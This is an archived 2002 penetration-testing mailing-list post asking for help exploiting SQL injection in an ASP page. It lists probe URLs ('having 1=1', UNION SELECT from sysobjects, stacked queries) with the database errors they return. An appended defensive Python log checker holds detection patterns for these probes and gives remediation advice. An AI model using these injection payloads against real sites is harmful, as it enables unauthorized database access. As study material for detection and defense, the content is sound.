Penetration Testing mailing list archives
Exploitable by SQL injection???
From: SQL injector <sql_injector () yahoo com>
Date: Sun, 7 Apr 2002 16:14:07 -0700 (PDT)
Greetings everyone.

It appears that I have an ASP page that is vulnerable to direct SQL injection. Alas, I am having some difficulty exploiting it. Below you will find my result set. My process is to enumerate the table and column names and then query the sysobject. My problem is that it seems that the server first tells me a valid table name and then appears to recant on it! After that it seems as though I am having a UNION problem. I am not sure whether this is due to my syntax or due to the fact that the SQL statement may reference another table that my UNION does not.

My analysis is that the SQL statement is exploitable but the number of tables involved makes it difficult if not impossible. Are there other ways to enumerate the other table names, if they exist? Is my syntax correct? Perhaps I need to change the UNION statement? There appears to be an ORDER BY which I've tried to comment out (--), but then I get a UNION syntax error. Where am I going wrong?

In the final analysis: Is this thing exploitable? Also note the goal here is just to retrieve information from the database, not bypass a logon.

-- Thanks sql_injector...

====================================================

Below you will find the process and the result after each:

vulnerable.asp?g=1
[returns valid page]

vulnerable.asp?g=1 having 1=1?
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Table.Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

vulnerable.asp?g=1 group by Table.Name having 1=1--
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Table.ID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

vulnerable.asp?g=1 group by Table.Name, Table.ID having 1=1--
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The column prefix 'Table' does not match with a table name or alias name used in the query.

vulnerable.asp?g=1 UNION ALL SELECT 'A',1 FROM sysobjects
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.

vulnerable.asp?g=1 UNION ALL SELECT Table.Name,Table.ID FROM sysobjects
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The column prefix 'Table' does not match with a table name or alias name used in the query.

****Here are some very interesting URLs that perhaps get to the heart of the matter.

vulnerable.asp?g=1;
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM SysObjects WHERE 1=1 ORDER BY 1,2
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM SysObjects WHERE 1=1 ORDER BY 1,2?
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.

****NOTE: Another interesting URL

vulnerable.asp?g=1; SELECT name FROM sysobjects
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The column prefix 'jTab' does not match with a table name or alias name used in the query.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
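
A defender's view of the requests quoted in this message, as an added example that is not part of the original post: a small log check that flags non-integer values of g and database error text returned to the client. It assumes g is meant to be a plain integer; the function names and sample lines are constructed for illustration, with probe strings and error text taken from the message.

```python
import re
from urllib.parse import unquote_plus

# Patterns taken from the probes and error text quoted in the message.
PROBES = {
    "having_probe": re.compile(r"\bhaving\s+\d+\s*=\s*\d+", re.I),
    "group_by_probe": re.compile(r"\bgroup\s+by\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "catalog_access": re.compile(r"\bsysobjects\b", re.I),
    "stacked_query": re.compile(r";"),
    "comment_terminator": re.compile(r"--"),
}
# Verbose driver errors reaching the browser are what let column names leak.
ERROR_LEAK = re.compile(r"0x80040E14|\[ODBC SQL Server Driver\]\[SQL Server\]", re.I)

def param_value(url, name="g"):
    """Return the URL-decoded value of query parameter `name`, or None."""
    for pair in url.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None

def analyse(url, body=""):
    """List findings for one request/response pair (assumes g is an integer)."""
    findings = []
    value = param_value(url)
    if value is not None and not re.fullmatch(r"\d{1,9}", value):
        findings.append("non_integer_g")
        findings += [name for name, rx in PROBES.items() if rx.search(value)]
    if ERROR_LEAK.search(body):
        findings.append("db_error_disclosed")
    return findings

# Constructed sample pairs, modelled on the requests and errors in the message.
ERR = "Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)"
SAMPLES = [
    ("/vulnerable.asp?g=1", "<html>ok</html>"),
    ("/vulnerable.asp?g=1%20having%201=1", ERR),
    ("/vulnerable.asp?g=1+UNION+ALL+SELECT+'A',1+FROM+sysobjects", ERR),
    ("/vulnerable.asp?g=1;", ERR),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, "->", analyse(url, body) or "clean")
```

The same integer check, applied in the page itself before the query is built, together with generic error pages, removes both the injection point and the error channel these requests rely on.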